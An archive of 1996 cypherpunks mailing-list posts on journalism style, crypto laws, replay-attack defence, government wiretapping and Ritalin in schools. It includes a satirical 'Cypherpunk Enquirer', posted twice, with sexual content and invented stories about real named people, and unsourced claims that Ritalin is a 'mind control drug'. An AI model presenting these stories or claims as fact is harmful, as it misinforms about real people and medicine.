See at: 
 
 
     http://www.washingtonpost.com 
 
 
No Web access? Or hate snooping newspapers, and spies traffic-analyzing?
Send us via Ross Anderson's true anonymizer end-to-end encrypted spize-only
top secret E-mail with the subject: EYE_son 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 8 Jul 1996 12:32:50 +0800
To: cypherpunks@toad.com
Subject: Re: Style gettting in the way of clear reporting
Message-ID: <ae05b307000210048efb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:40 AM 7/8/96, James A. Donald wrote:

>When news media were concentrated into fewer and fewer hands during
>the twentieth century, the appearance of neutrality, objectivity,
>and authoritativeness became a major selling point, and so media
>adopted a tone and manner of neutrality, with an accompanying
>"just-the-facts" style, though in reality they became far less neutral

An interesting point. You are probably right that journalism is becoming
more florid as "amateurs" flood the market. However, I don't quite buy the
concentration argument, as things were pretty concentrated in the Hearst
era, and the explosion of magazines in the past few decades has not been as
concentrated. (In any case, these are hard things to quantify without more
research, which I for one am unlikely to pursue.)

>Now that everyone can grab the megaphone, people are not so worried
>about objectivity.  If something is unfair to Nazis or blacks or evil
>polluting capitalists, they know they will hear about it from the
>Nazis, the blacks or the evil polluting capitalists.
>
>As a result, people no longer value the superficial appearance of
>neutrality and objectivity.  Suddenly colorful and openly biased
>reporting has become popular.

I still think of "The Wall Street Journal" and "The Economist," two of my
favorites, as being _careful_ in their reporting (careful is different from
unbiased). But my main focus in this thread was on the _styles_, and this I
think is more explained by faddishness.

And advertising. To get "mind space," as with "shelf space," the packaging
must entice, fool, and trick the reader.

>This has led to some people engaging in florid excesses of colorful
>style and concocting totally phony attitudes., just as when word
>processing programs first gained the capability to handle a wide
>variety of fonts, some people produced memos that looked like
>ransom notes.

Yes, and many of the newsletters we're seeing--as many are cc:ed or
forwarded to our list--are the kissing cousins of "zines." Same faux style,
same emphasis on "flash" over substance. (Not all of them of course.)

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 8 Jul 1996 09:45:58 +0800
To: sameer@c2.net (sameer)
Subject: Re: Restrictions on crypto overseas
In-Reply-To: <199607050215.TAA22048@atropos.c2.org>
Message-ID: <199607072344.SAA00327@homeport.org>
MIME-Version: 1.0
Content-Type: text



http://cwis.kub.nl/~frw/people/koops/lawsurvy.htm is Bert-Jaap
Koops Crypto Law Survey.

Seems pretty good, but I haven't tried to verify any of it.



| > Greetings.
| > 
| > I am looking for a concise description of the restrictions overseas on the
| > use of cryptography, and how those restrictions affect the operation of a
| > cryptographically-enabled web server.
| > 
| > I have been told that users of programs like PGP in france are required by
| > law to register their secret keys with the state security apparatus. Does
| > this mean that users of secure web servers need to register their secret
| > keys as well? Is anybody doing this? Is the law enforced?
| > 
| > What about other nations that have recently passed restrictions on the use
| > of crypto? Other than Russia, which are they? Is there a list anywhere?


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <root@edmweb.com>
Date: Mon, 8 Jul 1996 13:12:16 +0800
To: ichudove@algebra.com
Subject: Re: more about the usefulness of PGP
Message-ID: <Pine.BSF.3.91.960707190154.247A-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> make sure that you are protected from replay attacks.
> a good idea would be to make the server to send cookies by request of
> the remote user (you can limit the number of people to whom the server
> sends cookies) and make sure that messages without the latest cookie
> will NOT be executed.

A simpler solution would be for the user to number each message. He would
send message #1, then message #2, then #3, etc... Skipping some numbers
should not be a problem. The server would just have to keep track of the
most recently recieved message number, and only accept messages with a
larger number. The user would also have to keep track... It would be very
easy to do; the user could number each message based on date and time.


=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 |
|          -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. --          |
===================================================================:)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Mon, 8 Jul 1996 10:32:00 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <960707193940_232651692@emout12.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim, You have a very good point about what goes on in this thread. I wasnt
speaking about you yelling at me.. some of the members decided to write me
'personal' memos..one idiot being 'AOL SUCKS KILL ALL AOL SUCKS' or some
stupid idiotic undereducated statement like that. Thanks for the response
though..it was appreciated. :)
Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 8 Jul 1996 07:00:42 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <ae055cd3030210046616@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:02 PM 7/7/96, Robert Hettinga wrote:

>Like a lot of pop-psychopharmacology, "syndromes" frequently get defined by
>whether the right drug has the desired effect. If prozac works, you're
>depressed, if Ritalin does, you're an ADDer, and so on. By Tim's anecdotal
>evidence, the little hellion (hey, *I* was one...) must be ADD because
>Ritalin works.

Probably so, and I think I recall my friend mentioning that this was the
kid needed the dose. Whether it's an upper or a downer or whatever is
immaterial: it acts as a downer for this kid. A zombie drug, at least on
this kid. (And I gather that this is the main effect on the many California
schoolchildren who are getting their school-administered doses of mind
control drugs.)

>You can actually see ADD with a PET scan, but the proper way to get a
>diagnosis of ADD is to get tested for it, which, in the case of ADD, is an
>expensive man-day or two with with some clinical shrink in your face, and a
>bunch of frustrating (if you're ADD) tests of your attention and ability to
>focus in the presence of a lot of distractions. Oddly enough, *another*
>pop-psychologist from Harvard was on "20/20" this week talking about
>"emotional" intellegence, and one of the determinants was inability to
>understand delayed gratification. Like most kids with ADD, I must have been
>a drooling idiot, in that case.

>From what I've read--and I'm no expert, having long had essentially the
_opposite_ of "attention deficit disorder," assuming it really even
exists!--most children getting Ritalin are just being sedated. Behavior
control in its purest form. While the kids stop their wandering attention
and constant physical motions, it's because they're in a mental fog, just
one step away from drooling. (The 8-year-old friend of my friend's son is
so zoned out he can't play video games well at all...until the drugs wear
off.)

>However, I practically agree with Tim on all of his screed. (A good one, I
>might add. He probably only reread it once for punctuation and spelling
>before he did a command-e to send it on its way. After wiping the foam
>from his mouth, that is. ;-)) It seems to me that the very *last* person to

Au contraire, I almost _never_ rework my posts. They are sent out as I
write them, just as conversation is not reworked and edited. For an
informal list, the conversational mode works best for me. (I get a kick out
of John Young's obscure stuff, but if he _talks_ this way, whoah!)

>BarelyObCrypto: ADD is more about lack of attention *control* than lack of
>attention itself. Hyperfocus is also a trait of ADHD, and computers tend to
>cause hyperfocus for a lot of ADDers. How many easily distracted knee-jiggling
>wunderkind hackers do *you* know? Care to guess how many ADDers there are
>on cypherpunks?

BTW, I saw a comment that Bill Gates is almost certainly an ADD person...or
maybe the comment was that he is borderline autistic? (I think it was the
latter, based on his focus on things, his physical mannerisms, etc. Perhaps
growing up in rainy Seattle made him a kind of "rain man.")

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 8 Jul 1996 07:37:43 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <ae05616e040210047af4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:33 PM 7/7/96, AwakenToMe@aol.com wrote:
>Did I miss something?? I fisrt came here and asked something about protected
>mode and was yelled at for asking it in this newsgroup. Now we're onto mind
>control drugs?
>uhhhhhh ok.

I did not yell at you. Bear in mind that there are many subscribers, with
many views of what is interesting and what is important to talk about.

There are only so many times that a particular thread can be talked about
meaningfully, and some of the more crypto-related threads (which no one is
stopping anyone from starting!) have covered the same ground through dozens
of cycles. Thus, while "Where can I get SFS to encrypt my hard drive?," as
an example, may _seem_ to be list-relevant than discussions of Ritalin and
the use of it in public schools for behavior modification, I think the
former thread is "tired," and generates little response, where the latter
thread has obviously generated a lot of responses. This speaks for itself,
as I see it.

But, then, I view the list as partly a social community of reasonably
like-minded folks, with a shared interest in several obvious things, and
not just a place to discuss C++ code or where to find SFS and PGP.

Personally, I'm just as glad the list is not a clone of Libernet or
Commienet, but most political threads die out quickly enough. The "Ritalin"
thread will die out eventually, In the meantime, it appears to interest
quite a few people, and some readers may not have previously known that the
public schools are sending out the message of "Just say "No!" to drugs!"
while simultaneously using mind-control drugs to dose kids into submission.

Sort of like the Feds calling for strict controls on privacy technology
while freely passing around confidential FBI dossiers of their political
enemies. The foxes guarding the henhouses.

All of these examples are useful for our agenda.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Mon, 8 Jul 1996 08:38:38 +0800
To: cypherpunks@toad.com
Subject: DEA Intercepts
Message-ID: <199607072119.VAA10773@pipe1.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Would anyone know more about the DEA "process the intercepts by computer"
in the excerpt below from today's Wash Post? Any connection to Peter
Neuman's remarks at the CRISIS press conference about LEA training and
technology as alternatives to breaking strong crypto? 
 
 
   This new funding has been a factor in making possible 
   increased use of electronic surveillance. Federal wiretaps 
   cost more than $70,000 a month to operate and generate 
   hundreds of hours of labor for monitors, transcribers, 
   surveillance teams and investigators. Larger budgets mean 
   cost is less of an obstacle. 
 
   Building for the future, the DEA is carrying out a $33 
   million program to replace single-line wiretapping gear 
   with new equipment that can monitor 40 lines simultaneously 
   and process the intercepts by computer. The FBI is plowing 
   millions into developing new intercept techniques for 
   digital lines and expanding its cadre of agents who use the 
   bureau's high tech surveillance gear. 
 
   "I don't think J. Edgar Hoover would contemplate what we 
   can do today in terms of technology," Reno testified during 
   a Senate hearing in May. 
 
   The total number of federal wiretaps is just one measure of 
   the rise in federal surveillance. The build-up also is 
   evident in the increased use of electronic devices that 
   record the numbers dialed by a target telephone, and the 
   origin of calls to it. 
 
   These devices allow agents to identify a person's 
   associates. Beginning in 1993, Justice agencies began using 
   the court-authorized monitors more often and leaving them 
   installed for longer periods of time, according to a 
   Justice Department report. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 8 Jul 1996 08:43:27 +0800
To: cypherpunks@toad.com
Subject: Style gettting in the way of clear reporting
Message-ID: <ae0571f800021004c3af@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:28 PM 7/7/96, Raph Levien wrote:
>Declan McCullagh wrote:
>>
>> "We are writers, not crytographers."
>>
>> -Declan
>
>   Well done. Very well done. I'm not sure why Brock is constructing
>this hard-drinking bad-boy persona (perhaps he's trying to become the
>Trent Reznor of crypto journalism), but the piece was great.

I found it unreadable. No doubt some fine reporting, but the "faux
Chandler" touches made it unreadable for me.

"The last gin joint in cyberspace, and I had to to be the one to break it
the babe, a thirty-two bit floozy with gams as long as, well, let's just
say they made me forget about the Feds waiting to send me up the river for
the long one..."

With no _personal_ criticism of either Brock or Declan, I find that most
modern cyberspace journalism--much more so than the mainstream press--is
this kind of "performance piece" stuff, where pastiches of Chandler, Hunter
S. Thompson, Jack Kerouac, and all the like are lathered all over the
articles.

The clearest and most extreme examples of this trend are the columns by
Spencer S. Katt, Robert X. Cringely, and the other rumor-mongers of the
trade weeklies, where a few morsels of actual reporting are buried in vast
amounts of phony stuff. Such as endless crap about "Pammy," a dingbat--and
utterly fictional--Valley Girl who one of these columnists uses to pads his
columns with. This New Journalism kind of stuff is also rampant in "Wired."
I suppose some people like it. I call them easily impressed. Or as Raymond
S. might put it, "She was the kind of dame impressed by a paint by numbers
Mona Lisa."

Sadly, simple expository prose must be considered to be too boring, too banal.

(Actually, were only a few writers doing this, it might be mildy tolerable.
Speaking for myself, that is. But so _many_ "cyberspace journalists" are
doing bad pastiches of famous stylists that the reportage is being lost in
the noise.

"A screaming comes across the screen."

Wake up, Brock and Declan! And all the other too clever by half New
Journalists. I'd like to read some of your stuff, not hit the delete key as
soon as see the style-laden ersatz Chandler larding up the article.

--Tim May




Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 8 Jul 1996 16:35:33 +0800
To: cypherpunks@toad.com
Subject: Re: Style gettting in the way of clear reporting
Message-ID: <199607080519.WAA16763@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:38 PM 7/7/96 -0700, Timothy C. May wrote:
>At 12:40 AM 7/8/96, James A. Donald wrote:
>
>>When news media were concentrated into fewer and fewer hands during
>>the twentieth century, the appearance of neutrality, objectivity,
>>and authoritativeness became a major selling point, and so media
>>adopted a tone and manner of neutrality, with an accompanying
>>"just-the-facts" style, though in reality they became far less neutral
>
>An interesting point. You are probably right that journalism is becoming
>more florid as "amateurs" flood the market. However, I don't quite buy the
>concentration argument, as things were pretty concentrated in the Hearst
>era, and the explosion of magazines in the past few decades has not been as
>concentrated. (In any case, these are hard things to quantify without more
>research, which I for one am unlikely to pursue.)

It is probably true that journalism was more concentrated in the late 1800's 
and early 1900's, since it consisted of a few newspapers.  However, I think 
a good argument could be made that because government was dramatically 
smaller than today, that concentration was not nearly as detrimental as it 
would be today under similar circumstances.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Mon, 8 Jul 1996 13:23:18 +0800
To: Deranged Mutant <WlkngOwl@unix.asb.com>
Subject: Re: NYT/CyberTimes on CWD article
In-Reply-To: <199607071744.NAA25788@unix.asb.com>
Message-ID: <Pine.BSF.3.91.960707221720.234A-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 7 Jul 1996, Deranged Mutant wrote:

> 
> Another problematic with Net-Nurse type software: a database of 
> naughty sites and naughty users... a real goldmine for prosecutors.

My soon-to-be-former colleagues hardly need such software to find naughty 
sites.  Anyway, that takes all the fun out of it!

Brian 

> 
> 
> Rob.
> ---
> No-frills sig.
> Befriend my mail filter by sending a message with the subject "send help"
> Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
>         AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
> Send a message with the subject "send pgp-key" for a copy of my key.
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Mon, 8 Jul 1996 15:04:39 +0800
To: cypherpunks@toad.com
Subject: Re: Style gettting in the way of clear reporting [borderline NOISE]
In-Reply-To: <ae05b307000210048efb@[205.199.118.202]>
Message-ID: <9607080328.AA10834@outland.ain_dev>
MIME-Version: 1.0
Content-Type: text/plain


> I still think of "The Wall Street Journal" and "The Economist," two of my
> favorites, as being _careful_ in their reporting (careful is different from
> unbiased). But my main focus in this thread was on the _styles_, and this I
> think is more explained by faddishness.
>
> And advertising. To get "mind space," as with "shelf space," the packaging
> must entice, fool, and trick the reader.

	This might can be tied back in with Tim's other RANT about
prozac/ritalin/Haagen Daas/[insert your favorite mood altering
substance here] and ADD.  Today's kids supposedly can't concentrate on
anything for more than the duration of a music video or the first
"act" of Baywatch.  But it's all just simpler to dope them up and let
'em watch Pamela Sue jiggle than try to raise them properly.

> Yes, and many of the newsletters we're seeing--as many are cc:ed or
> forwarded to our list--are the kissing cousins of "zines." Same faux style,
> same emphasis on "flash" over substance. (Not all of them of course.)

	But media in general is becomming a meme-eat-meme world.  If
you don't entertain enough to hook the reader they won't bother with
you (and your meme never propagates).  Who cares if CSPAN is
broadcasting hearings on changes to some law that could fundamentally
change American society as we know it, there's an infomercial on for
that amazing new flameproof car wax that cures baldness and predicts
the future more accurately than Dionne Warwick.  The Sci-Fi Channel
needs to update their "Max Headroom" episodes from "20 minutes into
the future..." to only about ten (if that).

	Now where'd I leave my Zik Zak . . . :)

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Mon, 8 Jul 1996 15:07:08 +0800
To: ois-news@offshore.com.ai
Subject: Hurricane Bertha hitting Offshore Information Services
Message-ID: <Pine.LNX.3.91.960707231628.688A-100000@offshore>
MIME-Version: 1.0
Content-Type: text/plain




Hurricane Bertha is almost certainly going to hit Anguilla, where Offshore
Information Services is located.  It will probably be at the strongest
about 9 am Eastern time Monday morning.  This is still not a really big
hurricane, so we will not get anything like the trouble we had with Luis
last year. 

Still, there is some chance that we will be offline at some time.  If so
please understand why.

I have about 8 hours of battery backup.  If power is out at our location
for longer than that I will relocate the server to another location, as I
did after Luis.  There is little chance that power will go out everywhere
for longer than 8 hours. 

There is a good chance that we get through this without going down, but I
just wanted to let people know what our status is.  Be patient if sometime
tomorrow you can not get to our site. 

  --  Vince Cate
      Offshore Information Services, Ltd.
      Anguilla
      http://online.offshore.com.ai/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: enquirer@alpha.c2.org
Date: Mon, 8 Jul 1996 17:49:33 +0800
To: cypherpunks@toad.com
Subject: Cypherpunk Enquirer
Message-ID: <199607080632.XAA09042@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain



I finally lost the tail somewhere around the docks, and slowly worked my
way into Chiba, watching my back all the way.  I dumped the chip in
the saddlebag of a bike messenger who almost ran me down in front of 
the Jarre, figured he'd get a good scare out of a midnight visit from
the NSA goons who'd been using it to follow my tracks out of Tokyo.  They 
weren't going to like the way I rearranged the facial features of their 
buddy who tried to waylay me outside of the pachinko parlor.  One last glance
behind me, and I ducked into the Chatsubo.

She was waiting for me there, a vision of pure lust in a red mini-dress with
cleavage all the way down to her waist and legs all the way down to the
floor.  I tried to stay casual as I sauntered over to the bar next to her.
"Vodka martini.  Shaken, not stirred," I said to Ratz, the regular bartender.

Ratz slammed the drink down on the counter in front of me.  "Shaken enough
for you, Dick?" he said.

"Dick.  Nice name."  She had a voice that sounded like wind blowing through
pine trees on a hot summer night.  Low.  Breathy.  Wet.

"He's being an asshole.  Dick's American slang for a PI.  Mind if I join
you?"

"Suit yourself."  I pulled up a stool, surreptitiously slipping her PGP
signature into my PDA.  It checked out.  Good.  Now if she just had the
merchandise.  I hadn't come 5,000 miles just to check out her pectoral
development.

I leaned over close, trying not to stare at that pair of 38Ds.  "You got
anything else you'd like to show me?"

Her emerald green eyes bored into mine, and then slowly dropped down to 
the level of my zipper.  She slowly slid the hem of her dress up her
creamy thigh, just high enough so that I could see that she wasn't wearing
any panties.  And there it was.  Tucked into the top of her silk stocking,
just next to the black lace garter.

"That floppy's got the source to Declan McCullagh and Ian Goldberg's crack
of the Surfwatch database.  Worth a small fortune to anyone with the cojones
to spam a sample to K12."  She licked her lips like she was getting ready
to go down on a double dip of Cherry Garcia.  "Would you like to come up
to my room and take a closer look?"

(OK, Nobody, knock it off.  You got rid of Tim May three paragraphs ago.
Let's get on with it, huh?)

(Shit, boss, just trying to have a little fun ... )



			THE CYPHERPUNK ENQUIRER

                   "Encyphering minds want to know."


Fresh on the heels of the Chicago Bull's triumph in the NBA finals, 
Michael Jordan has announced the release of his new signature Internet
encryption product, Michael Jordan's Awfully Good Snake Oil.  Based on
a tried and tested but proprietary algorithm, AGSO is guaranteed to provide
superior 40 bit encryption of all important Internet traffic.  Michael
himself personally guarantees that AGSO will integrate perfectly with
the Eudora mailer, and used no 14 year old Nicaraguan programmers like
that inferior Kathy Lee Gifford shit, and no feminine frou-frou like with
Liz Taylor's Black Perl.

Jim Bell was injured today when a mail exploder went off in his hands.
Doctors at the Bethesda Naval Hospital reported that the mail exploder had
been upgraded from critical to stable condition and was resting comfortably
in a private room.  After a visit from fellow patient Louis Freeh, the
mail exploder commented, "It's surprising how well he's learned to talk
through that proctoscope."
 
Matt Blaze has finally come clean, and agreed to provide a partial 
transcript of the NSA's famous "If you knew what we know, you'd support
key escrow" presentation, which according to Mr. Blaze starts out, "If you
knew about the video tapes we have of you with that 16 year old blonde at
the Motel Six ... "

Due to continuing controversy over the Michael Jackson case, and bowing to
extreme election year pressure from the religious right, President Clinton
today announced a new policy to prevent child abuse in the music industry.
The Rock Musicians Penis Escrow Bill would require all musicians selling
more than 10,000 CDs to file photographs of their (presumably tumescent)
genitals with the FBI so that they could be examined and identified in the
event of accusations of lascivious behavior with minors.  Leon Panetta was
reportedly flying to Chicago for discussions with the presently retired
Plaster Casters, hoping to garner their support for the bill, while the
Wall Street Journal announced an investigation into rumors that Chelsea
has a standing request with the FBI for multiple copies.  The Libertarian
Party immediately announced its whole-hearted support for the plan after
Jim Ray snuck the plank into the party platform when no one was looking.

Tim May's experimental plan to reduce the noise level on the Cypherpunk
Mailing List was declared a resounding success after massive doses of 
Ritalin actually caused Perry Metzger to apologize for flaming a clueless
AOLer.  In related news, AwakenToMe has finally figured out protected mode,
and has announced the first Pentium condom that actually fits over the
cooling fan.

Sameer Parkesh announced that c2.org is now hosting an "Unanimizer" web
browser, which makes web servers think that the entire population of the
WhoWhere search engine has just accessed their pages.

Next in the Enquirer:  Bob Dole on the dangers of the abacus virus.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: enquirer@alpha.c2.org
Date: Mon, 8 Jul 1996 18:17:30 +0800
To: cypherpunks@toad.com
Subject: Cypherpunk Enquirer
Message-ID: <199607080632.XAA09082@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain



I finally lost the tail somewhere around the docks, and slowly worked my
way into Chiba, watching my back all the way.  I dumped the chip in
the saddlebag of a bike messenger who almost ran me down in front of 
the Jarre, figured he'd get a good scare out of a midnight visit from
the NSA goons who'd been using it to follow my tracks out of Tokyo.  They 
weren't going to like the way I rearranged the facial features of their 
buddy who tried to waylay me outside of the pachinko parlor.  One last glance
behind me, and I ducked into the Chatsubo.

She was waiting for me there, a vision of pure lust in a red mini-dress with
cleavage all the way down to her waist and legs all the way down to the
floor.  I tried to stay casual as I sauntered over to the bar next to her.
"Vodka martini.  Shaken, not stirred," I said to Ratz, the regular bartender.

Ratz slammed the drink down on the counter in front of me.  "Shaken enough
for you, Dick?" he said.

"Dick.  Nice name."  She had a voice that sounded like wind blowing through
pine trees on a hot summer night.  Low.  Breathy.  Wet.

"He's being an asshole.  Dick's American slang for a PI.  Mind if I join
you?"

"Suit yourself."  I pulled up a stool, surreptitiously slipping her PGP
signature into my PDA.  It checked out.  Good.  Now if she just had the
merchandise.  I hadn't come 5,000 miles just to check out her pectoral
development.

I leaned over close, trying not to stare at that pair of 38Ds.  "You got
anything else you'd like to show me?"

Her emerald green eyes bored into mine, and then slowly dropped down to 
the level of my zipper.  She slowly slid the hem of her dress up her
creamy thigh, just high enough so that I could see that she wasn't wearing
any panties.  And there it was.  Tucked into the top of her silk stocking,
just next to the black lace garter.

"That floppy's got the source to Declan McCullagh and Ian Goldberg's crack
of the Surfwatch database.  Worth a small fortune to anyone with the cojones
to spam a sample to K12."  She licked her lips like she was getting ready
to go down on a double dip of Cherry Garcia.  "Would you like to come up
to my room and take a closer look?"

(OK, Nobody, knock it off.  You got rid of Tim May three paragraphs ago.
Let's get on with it, huh?)

(Shit, boss, just trying to have a little fun ... )



			THE CYPHERPUNK ENQUIRER

                   "Encyphering minds want to know."


Fresh on the heels of the Chicago Bull's triumph in the NBA finals, 
Michael Jordan has announced the release of his new signature Internet
encryption product, Michael Jordan's Awfully Good Snake Oil.  Based on
a tried and tested but proprietary algorithm, AGSO is guaranteed to provide
superior 40 bit encryption of all important Internet traffic.  Michael
himself personally guarantees that AGSO will integrate perfectly with
the Eudora mailer, and used no 14 year old Nicaraguan programmers like
that inferior Kathy Lee Gifford shit, and no feminine frou-frou like with
Liz Taylor's Black Perl.

Jim Bell was injured today when a mail exploder went off in his hands.
Doctors at the Bethesda Naval Hospital reported that the mail exploder had
been upgraded from critical to stable condition and was resting comfortably
in a private room.  After a visit from fellow patient Louis Freeh, the
mail exploder commented, "It's surprising how well he's learned to talk
through that proctoscope."
 
Matt Blaze has finally come clean, and agreed to provide a partial 
transcript of the NSA's famous "If you knew what we know, you'd support
key escrow" presentation, which according to Mr. Blaze starts out, "If you
knew about the video tapes we have of you with that 16 year old blonde at
the Motel Six ... "

Due to continuing controversy over the Michael Jackson case, and bowing to
extreme election year pressure from the religious right, President Clinton
today announced a new policy to prevent child abuse in the music industry.
The Rock Musicians Penis Escrow Bill would require all musicians selling
more than 10,000 CDs to file photographs of their (presumably tumescent)
genitals with the FBI so that they could be examined and identified in the
event of accusations of lascivious behavior with minors.  Leon Panetta was
reportedly flying to Chicago for discussions with the presently retired
Plaster Casters, hoping to garner their support for the bill, while the
Wall Street Journal announced an investigation into rumors that Chelsea
has a standing request with the FBI for multiple copies.  The Libertarian
Party immediately announced its whole-hearted support for the plan after
Jim Ray snuck the plank into the party platform when no one was looking.

Tim May's experimental plan to reduce the noise level on the Cypherpunk
Mailing List was declared a resounding success after massive doses of 
Ritalin actually caused Perry Metzger to apologize for flaming a clueless
AOLer.  In related news, AwakenToMe has finally figured out protected mode,
and has announced the first Pentium condom that actually fits over the
cooling fan.

Sameer Parkesh announced that c2.org is now hosting an "Unanimizer" web
browser, which makes web servers think that the entire population of the
WhoWhere search engine has just accessed their pages.

Next in the Enquirer:  Bob Dole on the dangers of the abacus virus.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 8 Jul 1996 10:07:15 +0800
To: cypherpunks@toad.com
Subject: Re: DEA Intercepts
Message-ID: <ae058e4101021004ea7d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:19 PM 7/7/96, John Young wrote:
>Would anyone know more about the DEA "process the intercepts by computer"
>in the excerpt below from today's Wash Post? Any connection to Peter
>Neuman's remarks at the CRISIS press conference about LEA training and
>technology as alternatives to breaking strong crypto?

>   and process the intercepts by computer. The FBI is plowing
>   millions into developing new intercept techniques for
>   digital lines and expanding its cadre of agents who use the
>   bureau's high tech surveillance gear.

I have no way of knowing (and I doubt anybody knows and can also speak
publically about it), but my informed speculation would be that the FBI is
continuing its cooperation with the NSA (as noted by Ken Bass at last
week's SAFE forum) and is using COMINT processing gear and programs
developed at the Agency.

It has been widely reported, from Bamford on, that much of the Agency's
computer power is devoted to keyword analysis from audio intercepts. While
computer translation programs may not have progressed much beyond "The
vodka is strong, but the meat is rotten" stage, it is quite reasonable to
assume that computers can mark for later analysis vast amounts of audio
surveillance material, based on words said, voiceprints of known targets,
etc.

The trend of the next few decades is likely to be the turning of the
government's Big Ears and Big Eyes on its _real enemies_, namely, the
people.

>   "I don't think J. Edgar Hoover would contemplate what we
>   can do today in terms of technology," Reno testified during
>   a Senate hearing in May.

Actually, I think Hoover could well imagine the capabilities. Minaret and
such programs were in place while he was alive, and his use of confidential
dossiers as an instrument of power predated the current use by the Clintons
by several decades.


>   The total number of federal wiretaps is just one measure of
>   the rise in federal surveillance. The build-up also is
>   evident in the increased use of electronic devices that
>   record the numbers dialed by a target telephone, and the
>   origin of calls to it.
>
>   These devices allow agents to identify a person's
>   associates. Beginning in 1993, Justice agencies began using
>   the court-authorized monitors more often and leaving them
>   installed for longer periods of time, according to a
>   Justice Department report.

Needless to say, key escrow is quite useful in compiling contact lists. A
virtual pen register, as it were.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
